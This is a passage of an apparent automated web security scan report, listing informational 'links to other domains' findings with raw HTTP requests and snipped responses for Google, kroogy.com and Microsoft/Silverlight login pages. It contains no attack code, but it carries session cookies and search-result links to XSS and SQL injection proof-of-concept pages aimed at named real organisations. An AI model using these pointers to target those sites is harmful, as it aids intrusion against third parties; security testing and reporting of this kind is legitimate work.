Host:   http://khmdb0.googleapis.com
Path:   /kh

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /kh?v=37&hl=en-US&deg=0&x=260&y=415&z=10&s=Gal HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: khmdb0.googleapis.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2011 16:49:37 GMT
Server: btfe
Content-Length: 11857
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...
</style>
<a href=//www.google.com/ id=g><img src=//www.google.com/images/logo_sm.gif alt=Google></a>
...[SNIP]...

23.470. http://khmdb1.googleapis.com/kh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb1.googleapis.com
Path:   /kh

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /kh?v=37&hl=en-US&deg=0&x=261&y=415&z=10&s=Galile HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: khmdb1.googleapis.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2011 16:49:36 GMT
Server: btfe
Content-Length: 11860
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...
</style>
<a href=//www.google.com/ id=g><img src=//www.google.com/images/logo_sm.gif alt=Google></a>
...[SNIP]...

23.471. http://kroogy.com/search/emailafriend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/emailafriend

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/emailafriend?url=http%3A%2F%2Fkroogy.com HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:38:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 13982

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
<td height="10px;" align="center" style="padding-bottom:5px;"><a style="color:threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.inoutscripts.com/?r=">Powered by Inoutscripts</a>
...[SNIP]...
</span>
<a style="color: threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.thumbshots.com" target="_blank" title="About Thumbshots thumbnails">About Thumbshots thumbnails</a>
...[SNIP]...

23.472. http://kroogy.com/search/noresults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/noresults?search=site:xss.cx&type=sports HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 29146

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
<td height="10px;" align="center" style="padding-bottom:5px;"><a style="color:threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.inoutscripts.com/?r=">Powered by Inoutscripts</a>
...[SNIP]...
</span>
<a style="color: threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.thumbshots.com" target="_blank" title="About Thumbshots thumbnails">About Thumbshots thumbnails</a>
...[SNIP]...

23.473. http://kroogy.com/search/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/web?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=sports
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.7.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 64806

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
<div id="thumbshot0" style="">
                       <a href="http://xss.cx/" alt="xss.cx" title="xss.cx">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/">
XSS, SQL Injection, HTTP Header Injection, Research, Reporting</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot1" style="">
                       <a href="http://xss.cx/learning.aspx" alt="xss.cx/learning.aspx" title="xss.cx/learning.aspx">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/learning.aspx"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/learning.aspx">
XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-79, CWE-113 ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/learning.aspx" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot2" style="">
                       <a href="http://xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html" alt="xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html" title="xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html">
Stored XSS, Permanent Cross Site-scripting, SmarterMail 8.0.4086 ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/smartermail-80-full-disclosure-report-hoyt-llc-research.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot3" style="">
                       <a href="http://xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html" alt="xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html" title="xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html">
XSS, mail.google.com, JavaScript, Event Handler</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/exploits/xss-javascript-event-handler-mailgooglecom.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot4" style="">
                       <a href="http://xss.cx/splitting.aspx" alt="xss.cx/splitting.aspx" title="xss.cx/splitting.aspx">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/splitting.aspx"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/splitting.aspx">
HTTP Header Injection, HTTP Response Splitting, CWE-113, Proof of ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/splitting.aspx" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot5" style="">
                       <a href="http://xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html" alt="xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html" title="xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html">
XSS, SQL Injection DORK, cadwalader.com, CWE-89, CWE-79</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/dork/lawyers/xss-sql-injection-dork-cadwalader.com.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot6" style="">
                       <a href="http://xss.cx/examples/html/verizon.com-example-3.html" alt="xss.cx/examples/html/verizon.com-example-3.html" title="xss.cx/examples/html/verizon.com-example-3.html">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/html/verizon.com-example-3.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/html/verizon.com-example-3.html">
verizon.com, Example, PoC, XSS, CWE-79, CAPEC-86, Cross Site ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/html/verizon.com-example-3.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot7" style="">
                       <a href="http://xss.cx/examples/plesk-reports/plesk-xss.html" alt="xss.cx/examples/plesk-reports/plesk-xss.html" title="xss.cx/examples/plesk-reports/plesk-xss.html">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/plesk-reports/plesk-xss.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/plesk-reports/plesk-xss.html">
XSS, SQL Injection, Plesk Small Business Manager 10.2.0 ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/plesk-reports/plesk-xss.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot8" style="">
                       <a href="http://xss.cx/examples/netsparker/www.brownrudnick.com_80.htm" alt="xss.cx/examples/netsparker/www.brownrudnick.com_80.htm" title="xss.cx/examples/netsparker/www.brownrudnick.com_80.htm">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/netsparker/www.brownrudnick.com_80.htm"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/netsparker/www.brownrudnick.com_80.htm">
Boolean SQL Injection, www.brownrudnick.com, CWE-89, CAPEC-66, DORK</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/netsparker/www.brownrudnick.com_80.htm" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div id="thumbshot9" style="">
                       <a href="http://xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http-put.html" alt="xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http..." title="xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http...">
                       <img class="thumbshotimage"src="http://open.thumbshots.org/image.pxf?url=http://xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http-put.html"></a>
...[SNIP]...
<span
                           class="resulttitle"><a class="resultlink"
                           href="http://xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http-put.html">
HTTP PUT, CWE-650: Trusting HTTP Permission Methods on the Server ...</a>&nbsp;
                       <a target="_blank" class="resultlink"
                           href="http://xss.cx/examples/html/cwe-650-trusting-http-permission-methods-on-the-server-side-http-put.html" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                           src="images/nw_blue.gif">
...[SNIP]...
<div width=162 align=right>
<iframe name="I1" src="http://pub.retailer-amazon.net/banner_120_600_a.php?search={$keyword}" marginwidth="1" marginheight="1" height="601" width="162" scrolling="no" align="middle" border="0" frameborder="0">
</iframe>
...[SNIP]...
<td height="10px;" align="center" style="padding-bottom:5px;"><a style="color:threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.inoutscripts.com/?r=">Powered by Inoutscripts</a>
...[SNIP]...
</span>
<a style="color: threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.thumbshots.com" target="_blank" title="About Thumbshots thumbnails">About Thumbshots thumbnails</a>
...[SNIP]...
</span>
<a style="color:threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.bing.com">Powered by Bing</a>
...[SNIP]...

23.474. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1303660392&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14318
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 15:52:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1303660423&co=1&id=265631; path=/;version=1
Set-Cookie: MSPOK=$uuid-18b94e66-b7b0-49aa-b234-106cb7e83e44; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1Q57 V: 0
Date: Sun, 24 Apr 2011 15:53:43 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1Q57 2011.03.07.16.56.24 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA080, -- Version: 10,0,17133,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

23.475. https://login.silverlight.net/login/createuser.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ocpzfo45cjdd3er2s2e2k155; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:14 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:14 GMT
Content-Length: 9052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660394&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660394&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

23.476. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iwguskeht5pp3amyv0gl5fuz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:17 GMT
Content-Length: 13113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660397&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660397&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660397&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

23.477. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2feasterr0xes.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fknt5h45vxmvo145ez4j1l55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://forums.silverlight.net/members/easterr0xes.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:08:39 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:39 GMT
Content-Length: 13232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660719&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fmembers%2Feasterr0xes.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660719&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fmembers%2Feasterr0xes.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660719&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fmembers%2Feasterr0xes.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

23.478. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3fUserID%3d60099 HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

